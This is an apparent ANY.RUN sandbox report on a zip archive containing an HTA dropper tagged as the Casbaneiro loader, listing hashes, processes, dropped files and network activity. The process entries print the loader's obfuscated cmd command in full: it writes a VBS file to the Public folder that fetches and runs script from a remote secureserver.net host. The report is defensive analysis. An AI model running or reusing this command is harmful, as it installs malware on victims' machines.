File name:

Setup-15052025130545.zip

Full analysis: https://app.any.run/tasks/2dfcf179-90a6-47f6-aee1-7c42bc6459be
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 15, 2025, 20:10:47
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-scr
casbaneiro
loader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v1.0 to extract, compression method=store
MD5:

2A7F797F2B2373193CC128EFF067AC64

SHA1:

A1656755F1F08F00C64572C45791A88FC9DA0CB6

SHA256:

41EFF1AA90D46E5573F0F7FB8D4EE3F8CA438231EBEC9A90EDCA12F49D38F14E

SSDEEP:

96:XrvSLTIyP/Hb0xbECyMfmPGnmumalm8avguMxSnOCAr7kOZO0RnuXHyl:XrvqTIoD0x5k+Navg+n/ZOtRYQ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • CASBANEIRO has been detected

      • cmd.exe (PID: 4688)
      • cmd.exe (PID: 5988)
    • Generic archive extractor

      • WinRAR.exe (PID: 680)
    • Accesses name of a computer manufacturer via WMI (SCRIPT)

      • wscript.exe (PID: 5528)
    • Accesses BIOS(Win32_BIOS, may evade sandboxes) via WMI (SCRIPT)

      • wscript.exe (PID: 5528)
    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 5528)
    • Gets script object from HTTP/HTTPS (SCRIPT)

      • wscript.exe (PID: 5528)
  • SUSPICIOUS

    • Application launched itself

      • cmd.exe (PID: 5416)
      • cmd.exe (PID: 4688)
      • cmd.exe (PID: 5988)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 5988)
      • cmd.exe (PID: 4688)
      • mshta.exe (PID: 4408)
      • cmd.exe (PID: 5416)
    • Likely accesses (executes) a file from the Public directory

      • cmd.exe (PID: 5416)
      • cmd.exe (PID: 4688)
      • cmd.exe (PID: 5988)
      • cmd.exe (PID: 4756)
      • wscript.exe (PID: 5528)
    • The process executes VB scripts

      • cmd.exe (PID: 4756)
    • Accesses OperatingSystem(Win32_OperatingSystem) via WMI (SCRIPT)

      • wscript.exe (PID: 5528)
    • Accesses WMI object, sets custom ImpersonationLevel (SCRIPT)

      • wscript.exe (PID: 5528)
    • Accesses ComputerSystem(Win32_ComputerSystem) via WMI (SCRIPT)

      • wscript.exe (PID: 5528)
    • Executes WMI query (SCRIPT)

      • wscript.exe (PID: 5528)
    • Accesses language version of the operating system installed via WMI (SCRIPT)

      • wscript.exe (PID: 5528)
    • Accesses computer name via WMI (SCRIPT)

      • wscript.exe (PID: 5528)
    • Access Product Name via WMI (SCRIPT)

      • wscript.exe (PID: 5528)
    • Accesses domain name via WMI (SCRIPT)

      • wscript.exe (PID: 5528)
    • Gets computer name (SCRIPT)

      • wscript.exe (PID: 5528)
    • Accesses operating system name via WMI (SCRIPT)

      • wscript.exe (PID: 5528)
    • Accesses WMI object caption (SCRIPT)

      • wscript.exe (PID: 5528)
  • INFO

    • Manual execution by a user

      • mshta.exe (PID: 4408)
      • WinRAR.exe (PID: 6476)
    • Checks proxy server information

      • mshta.exe (PID: 4408)
      • wscript.exe (PID: 5528)
      • slui.exe (PID: 6640)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 4408)
    • Reads the software policy settings

      • slui.exe (PID: 5216)
      • slui.exe (PID: 6640)
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 10
ZipBitFlag: -
ZipCompression: None
ZipModifyDate: 2025:05:15 19:05:44
ZipCRC: 0x2f3dda10
ZipCompressedSize: 6525
ZipUncompressedSize: 6525
ZipFileName: Setup-15052025130545.hta
Total processes: 145
Monitored processes: 15
Malicious processes: 4
Suspicious processes: 0

Behavior graph

start winrar.exe no specs sppextcomobj.exe no specs slui.exe winrar.exe no specs rundll32.exe no specs mshta.exe no specs #CASBANEIRO cmd.exe no specs conhost.exe no specs cmd.exe no specs #CASBANEIRO cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wscript.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID: 680
CMD: "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\Setup-15052025130545.zip
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Exit code: 0
Version: 5.91.0

PID: 1812
CMD: C:\WINDOWS\system32\cmd.exe /S /D /c" echo"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.3636 (WinBuild.160101.0800)

PID: 2140
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\Windows\System32\SppExtComObj.Exe
Parent process: svchost.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: KMS Connection Broker
Exit code: 0
Version: 10.0.19041.3996 (WinBuild.160101.0800)

PID: 3332
CMD: C:\WINDOWS\system32\cmd.exe /S /D /c" echo"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.3636 (WinBuild.160101.0800)

PID: 4008
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)

PID: 4408
CMD: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\admin\Desktop\Setup-15052025130545\Setup-15052025130545.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Path: C:\Windows\SysWOW64\mshta.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft (R) HTML Application host
Exit code: 0
Version: 11.00.19041.1 (WinBuild.160101.0800)

PID: 4688
CMD: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"DDmjXJbYtOkhEValsmLuXsF=".":dghwmsRwqZct="i":EtBXmXsEweAtqNOseqsEkb=":":XDarh="g":GetO">C:\Users\Public\tuGYPPqTnTYnIIR.vbs&echo|set /p=^"bject("scr"+dghwmsRwqZct+"pt"+EtBXmXsEweAtqNOseqsEkb+"hT"+"Tps"+EtBXmXsEweAtqNOseqsEkb+"//102"+DDmjXJbYtOkhEValsmLuXsF+"57"+DDmjXJbYtOkhEValsmLuXsF+"205"+DDmjXJbYtOkhEValsmLuXsF+"92"+DDmjXJbYtOkhEValsmLuXsF+"host"+DDmjXJbYtOkhEValsmLuXsF+"secureserver"+DDmjXJbYtOkhEValsmLuXsF+"net//"+XDarh+"1")">>C:\Users\Public\tuGYPPqTnTYnIIR.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\tuGYPPqTnTYnIIR.vbs
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Version: 10.0.19041.3636 (WinBuild.160101.0800)

PID: 4756
CMD: c:\windows\system32\cmd.exe /c start C:\Users\Public\tuGYPPqTnTYnIIR.vbs
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.3636 (WinBuild.160101.0800)

PID: 5216
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows Activation Client
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)

PID: 5416
CMD: C:\WINDOWS\system32\cmd.exe /S /D /c" set /p="bject("scr"+dghwmsRwqZct+"pt"+EtBXmXsEweAtqNOseqsEkb+"hT"+"Tps"+EtBXmXsEweAtqNOseqsEkb+"//102"+DDmjXJbYtOkhEValsmLuXsF+"57"+DDmjXJbYtOkhEValsmLuXsF+"205"+DDmjXJbYtOkhEValsmLuXsF+"92"+DDmjXJbYtOkhEValsmLuXsF+"host"+DDmjXJbYtOkhEValsmLuXsF+"secureserver"+DDmjXJbYtOkhEValsmLuXsF+"net//"+XDarh+"1")">>C:\Users\Public\tuGYPPqTnTYnIIR.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\tuGYPPqTnTYnIIR.vbs"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.3636 (WinBuild.160101.0800)

Total events: 4 904
Read events: 4 875
Write events: 29
Delete events: 0

Modification events

(PID) Process: (680) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | Operation: write | Name: 3 | Value: C:\Users\admin\Desktop\preferences.zip
(PID) Process: (680) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | Operation: write | Name: 2 | Value: C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process: (680) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | Operation: write | Name: 1 | Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process: (680) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | Operation: write | Name: 0 | Value: C:\Users\admin\Desktop\Setup-15052025130545.zip
(PID) Process: (680) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | Operation: write | Name: name | Value: 120
(PID) Process: (680) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | Operation: write | Name: size | Value: 80
(PID) Process: (680) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | Operation: write | Name: type | Value: 120
(PID) Process: (680) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | Operation: write | Name: mtime | Value: 100
(PID) Process: (680) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths | Operation: write | Name: name | Value: 256
(PID) Process: (680) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths | Operation: write | Name: size | Value: 80
Executable files: 0
Suspicious files: 4
Text files: 4
Unknown types: 1

Dropped files

PID
Process
Filename
Type
PID: 5988 | Process: cmd.exe | Filename: C:\Users\Public\tuGYPPqTnTYnIIR.vbs | Type: text
MD5:B4FFA7F25020F9259B1176DD43A5002E
SHA256:90D9DF108BA788893FBDD05DD960F455BFEE903FB0B79E2653CA1994405592E2
PID: 6476 | Process: WinRAR.exe | Filename: C:\Users\admin\Desktop\Setup-15052025130545\README.md | Type: binary
MD5:8DAA97D2C88561B0CD5F5328ED76B8CC
SHA256:7789EF70BFB2E26CC32ECF3FA65B1A692A6FE1FF06531FCFA39F0CF104BD0E54
PID: 5528 | Process: wscript.exe | Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BF802A2F2F94A22C056A1A4B8A44BB8F_680DB6477E21E9909FDFFAF811D5496F | Type: binary
MD5:6E8B3E9DEEA9B7D55E6152E09B55D806
SHA256:4B4B3A32471C2FBB987A7308A4F3212636B9C041A6F17109B1F2179F59F5190D
PID: 5528 | Process: wscript.exe | Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\g1[1].htm | Type: html
MD5:8D156A3026840157CA292D51F52152BC
SHA256:CA74AE119560729490CBA0ECEE5FD787F05ACACFDC56E675C262A77DD827263C
PID: 5528 | Process: wscript.exe | Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | Type: der
MD5:E192462F281446B5D1500D474FBACC4B
SHA256:F1BA9F1B63C447682EBF9DE956D0DA2A027B1B779ABEF9522D347D3479139A60
PID: 5528 | Process: wscript.exe | Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | Type: binary
MD5:746DC47E10497F8E799B0983BF7A3AF2
SHA256:AB6F6C9B21E843367967D2C6436B11D43ABAE885095433854C2C2E985C644D2D
PID: 6476 | Process: WinRAR.exe | Filename: C:\Users\admin\Desktop\Setup-15052025130545\Setup-15052025130545.hta | Type: html
MD5:1E34C12D5CB7759AE2A5FE4EDACE94A2
SHA256:7473F9F30CDDEB34E13F3A9A9604D3675B960050E42EAEAEAC3FEB4A26217017
PID: 5528 | Process: wscript.exe | Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCV3KQBA\g1[1].txt | Type: xml
MD5:2BA4D2B1C609AEB2A2400078E56BA645
SHA256:9953A1442560EAB616CC4AD84D75D54758B9D243DFBE36B20EC52F53E8FEAF43
PID: 5528 | Process: wscript.exe | Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BF802A2F2F94A22C056A1A4B8A44BB8F_680DB6477E21E9909FDFFAF811D5496F | Type: binary
MD5:9899FCA12B3071C41E992E6C7994C17E
SHA256:164B8A9BDD2599CBF1F14F35776DBFC8F60EDB6E21F4AC8ACFFC2B286870E988
HTTP(S) requests: 9
TCP/UDP connections: 28
DNS requests: 21
Threats: 0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.216.77.37:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
304
23.216.77.37:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5528
wscript.exe
GET
200
2.16.168.117:80
http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgXTpRNyPUo0IRfkZ4xJHFaaRQ%3D%3D
unknown
whitelisted
5528
wscript.exe
GET
200
23.209.209.135:80
http://x1.c.lencr.org/
unknown
whitelisted
6576
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6576
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
- | - | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
5496 | MoUsoCoreWorker.exe | 23.216.77.37:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
- | - | 23.216.77.37:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
5496 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
- | - | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
6544 | svchost.exe | 20.190.160.22:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.104.136.2
whitelisted
google.com
  • 142.250.186.142
whitelisted
crl.microsoft.com
  • 23.216.77.37
  • 23.216.77.29
  • 23.216.77.42
  • 23.216.77.5
  • 23.216.77.39
  • 23.216.77.26
  • 23.216.77.43
  • 23.216.77.30
  • 23.216.77.35
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
client.wns.windows.com
  • 172.211.123.250
  • 172.211.123.249
whitelisted
login.live.com
  • 20.190.160.22
  • 20.190.160.3
  • 20.190.160.132
  • 40.126.32.74
  • 40.126.32.134
  • 40.126.32.133
  • 40.126.32.138
  • 20.190.160.65
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
via.placeholder.com
whitelisted
102.57.205.92.host.secureserver.net
  • 92.205.57.102
whitelisted
x1.c.lencr.org
  • 23.209.209.135
whitelisted

Threats

No threats detected
No debug info